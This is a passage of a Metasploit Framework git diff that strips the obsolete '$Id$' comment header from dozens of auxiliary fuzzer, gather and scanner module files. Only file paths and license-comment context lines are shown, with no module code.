--- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index 14bdc02400..7f62f334ec 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb index cb4e8c41ec..a88190c385 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb index 7e81de3333..20e675e0ea 100644 --- a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb +++ b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index e373682bad..efd9538a22 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index 26a965e622..99b1ed0f38 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 36b7214d63..1144aee22c 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/gather/search_email_collector.rb b/modules/auxiliary/gather/search_email_collector.rb index 4a7e45e195..003c3c81d7 100644 --- a/modules/auxiliary/gather/search_email_collector.rb +++ b/modules/auxiliary/gather/search_email_collector.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index 72390fd562..4df5b18199 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index 1bbdea978e..9423f20bc6 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/db2/db2_auth.rb b/modules/auxiliary/scanner/db2/db2_auth.rb index 113317b473..a265e97cfd 100644 --- a/modules/auxiliary/scanner/db2/db2_auth.rb +++ b/modules/auxiliary/scanner/db2/db2_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/db2/db2_version.rb b/modules/auxiliary/scanner/db2/db2_version.rb index 9fae3e946a..62d8ec2a72 100644 --- a/modules/auxiliary/scanner/db2/db2_version.rb +++ b/modules/auxiliary/scanner/db2/db2_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 89483537d1..26972416a3 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index 50a47887dd..37c52e70e6 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 36e96c4822..06d545b37a 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index 5288d190ba..d3037ad441 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index 81fff149c1..d51234e7e6 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index ccfee42bd4..ae09fd8cc1 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index 1ee1c68acc..6b158ddc5c 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 73f626da2e..25a45d98d0 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 6af11951a5..96b678529e 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 229bc85b38..424ff1a94f 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 71649a12a2..b1c7642c22 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index 7ac5b1c0c3..ec62cc8032 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 9300392820..fce91ffe10 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 3cef16c0aa..65128f38ad 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index 2b8047a156..2692991c65 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 308f9e287d..4dd49b4a29 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 0dd756de27..3859629af5 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index 78ac32a09e..f398d93005 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index a0bd89d9c0..76e67765f7 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index 6aec8cad4f..ab3b4da161 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index 10ed923407..0a33656b3e 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb index a6748b4452..4bc3dcad3b 100644 --- a/modules/auxiliary/scanner/http/axis_login.rb +++ b/modules/auxiliary/scanner/http/axis_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index 9e252f2b4c..ae3b6defbb 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index 59785ccd78..93694bc6f4 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index b9ce76ec5a..e0803a2b84 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/brute_dirs.rb b/modules/auxiliary/scanner/http/brute_dirs.rb index 731f417f92..1ee4cda7f5 100644 --- a/modules/auxiliary/scanner/http/brute_dirs.rb +++ b/modules/auxiliary/scanner/http/brute_dirs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/cert.rb b/modules/auxiliary/scanner/http/cert.rb index c9bfe79e2c..da04e3b1ac 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 70bfe3f04d..01b09e21df 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index 80500f00f0..81077c17d4 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 24cc6c3d86..54528281fe 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 176e90923f..173d2d1649 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index db1ed88bd2..7934c26749 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index a5e1f1a7c8..de38cf06ba 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 5b71b8a1ce..b952cbc98f 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index 9a2f5b2823..a29e79687f 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index 53ddb8dd60..01bb02af12 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 00b07c63ac..eb290dc808 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index 15f821499e..57b83d2446 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 277dd489e2..8620a31e1c 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index 7c12c8e3ef..a3518af954 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index e684ba8d6c..a2c8d8d0a4 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index 21d0dfb878..e430fd496b 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index c8ac957801..c37f94e0ed 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 45d8c69603..3abc443fda 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index 9bbc8b123e..24d2bf41fa 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 0e7b0936bd..b33e4a3be0 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index ebb13a1247..9c9ff8af15 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/impersonate_ssl.rb b/modules/auxiliary/scanner/http/impersonate_ssl.rb index 021a4ae319..0a1f0328b0 100644 --- a/modules/auxiliary/scanner/http/impersonate_ssl.rb +++ b/modules/auxiliary/scanner/http/impersonate_ssl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index 407028750b..aaa4baefd1 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb index db5e8fc434..811642bcfd 100644 --- a/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 1e03a0049e..8178c7c237 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb index b1947d197b..28c13e0e3c 100644 --- a/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb index ddb666f002..730d26a35c 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb index 8b82ba5100..bf54abe547 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 369dc94ca0..538625e100 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index 5f1e605b53..e2f73a1b2b 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index d2fb147ec2..7cb546716e 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index 14587cb43a..801dc3b73c 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb 